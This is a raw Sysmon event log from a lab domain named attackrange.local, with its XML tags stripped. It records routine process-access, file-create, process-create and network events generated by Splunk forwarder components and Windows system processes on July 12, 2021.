Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02D50DC8FA70F3B974199583E4B9A234,SHA256=C0B835EE7AA65E433F7EC21BE31BF820195D88DBED800BD55271991FA005709F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C9B541F52FBBEA5FE01F1B1BF7BDF3,SHA256=F15505030DA50280DCF49F6AC99EDC058BB64B4D95B0F920B579DA300FBE8A8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.357{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.341{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:26.342{0C1E0330-F532-60EB-8479-00000000D001}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.982{0C1E0330-F533-60EB-8679-00000000D001}30282420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.935{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435B0F165A61AF3FB638F73B80C3AFEE,SHA256=D732EA1F09CF5ECBB3B57A0538DF0597E5B813EDA8767411BE133F0D6FF3BEC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:27.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697B4A7D112AE01FFB6E69B883E9516A,SHA256=544EC8738825ADF5206BE65F99CBCAE2CF851C4E3EB6DA39CA907FEED56B69F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:19.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51059-false10.0.1.12-8000- 10341000x8000000000000000807982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F533-60EB-8679-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:27.716{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 